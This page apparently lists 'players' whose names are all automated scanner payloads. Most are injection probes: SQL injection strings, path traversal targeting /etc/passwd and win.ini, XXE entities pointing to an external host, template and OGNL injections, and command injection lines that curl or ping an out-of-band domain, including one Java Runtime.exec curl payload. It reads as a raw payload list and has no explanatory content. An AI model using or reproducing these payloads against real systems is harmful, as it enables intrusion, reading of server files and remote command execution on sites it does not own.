Players 157
-
set|set&set
🤷
- -1224') OR 3304=2361 AND ('mpUT'='mpUT 🤷
- -1621 OR 5446=5446 🤷
- -2844' OR 7700=2408 AND 'pAdk'='pAdk 🤷
- -3239�' OR 7030=8730 limit 10# 🤷
- -3332�' OR 5446=5446 limit 10# 🤷
- -3498) OR 5446=5446 AND (4747=4747 🤷
- -4147 OR 1774=2603-- PknR 🤷
- -4481 OR 8963=6365-- ecoQ 🤷
- -4706' OR 1493=6469 AND 'OrjY'='OrjY 🤷
- -5171 OR 7388=3514 🤷
- -5678') OR 4776=9817 AND ('rWaQ'='rWaQ 🤷
- -5690 OR 5446=5446-- cCcc 🤷
- -7066') OR 5446=5446 AND ('hAzr'='hAzr 🤷
- -7763) OR 7126=2942 AND (7195=7195 🤷
- -7874' OR 5446=5446 AND 'acDO'='acDO 🤷
- -7899�' OR 7520=2862 limit 10# 🤷
- -9214 🤷
- ;`curl 1s81ra58.dns.9b5501a3.axss.xyz --retry 0`; 🤷
- ;print(md5(security_test)); 🤷
- ;set|set&set; 🤷
- ;system("ping -nc 4 1s81ra58.dns.9b5501a3.axss.xyz"); 🤷
- !(()&&!|*|*| 🤷
- ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 🤷
- ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 🤷
- ../../../../../../../../../../../../../../../proc/version 🤷
- ../../../../../../../../../../boot.ini 🤷
- ../../../../../../../../../../etc/passwd 🤷
- ../../../../../../../../../../etc/passwd%00.jpg 🤷
- ../../../../../../../../../../windows/win.ini 🤷
- ../../../../../../../../../../windows/win.ini%00.jpg 🤷
- ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 🤷
- ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 🤷
- ..\..\..\..\..\..\..\..\windows\win.ini 🤷
- ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 🤷
- ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 🤷
- ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 🤷
- ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 🤷
- .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 🤷
- ';print(md5(security_test));$a=' 🤷
- '" 🤷
- 'set|set&set' 🤷
- ";print(md5(security_test));$a=" 🤷
- "".getClass().forName("java.lang.Runtime").getMethod("exec", "".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null), "curl http://rnduu1akwwi.9b5501a3.axss.xyz") 🤷
- "set|set&set" 🤷
- (SELECT (CASE WHEN (4671=4671) THEN 'aSdFh1' ELSE (SELECT 3017 UNION SELECT 8290) END)) 🤷
- (SELECT (CASE WHEN (8803=2867) THEN 'aSdFh1' ELSE (SELECT 2867 UNION SELECT 5900) END)) 🤷
- ) 🤷
- [] 🤷
- {{12*'9999672'}} 🤷
- /../..//../..//../..//../..//../..//etc/passwd%00.jpg 🤷
- /.././.././.././.././.././.././.././../etc/./passwd%00 🤷
- /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 🤷
- /\../\../\../\../\../\../\../etc/passwd 🤷
- /etc/passwd 🤷
- %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',4236*8649)}
🤷
- %2fetc%2fpasswd 🤷
- %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini 🤷
- `set|set&set` 🤷
- ^(#$!@#$)(()))****** 🤷
- <!-- 🤷
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE body SYSTEM "http://84f73dd3.dns.9b5501a3.axss.xyz/"><body><method>test</method></body> 🤷
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://84f73dd3.dns.9b5501a3.axss.xyz/">%xxe;]> 🤷
- <?xml version="1.0" encoding="utf-8"?><!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN""http://84f73dd3.dns.9b5501a3.axss.xyz/"><roottag>xxe</roottag> 🤷
- <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [ <!ENTITY xxeent SYSTEM "http://84f73dd3.dns.9b5501a3.axss.xyz/">]><xyz>&xxeent;</xyz> 🤷
- <%=9999210*9999369%> 🤷
- <xi:include href="http://84f73dd3.dns.9b5501a3.axss.xyz/" parse="text"/> 🤷
- ${"~||~".join(["first", "second"])} 🤷
- ${{<%[%'"}}%\ 🤷
- ${@print(md5(security_test))} 🤷
- ${@print(md5(security_test))}\ 🤷
- ${9999561 + 9999920} 🤷
- 1some_inexistent_file_with_long_name%00.jpg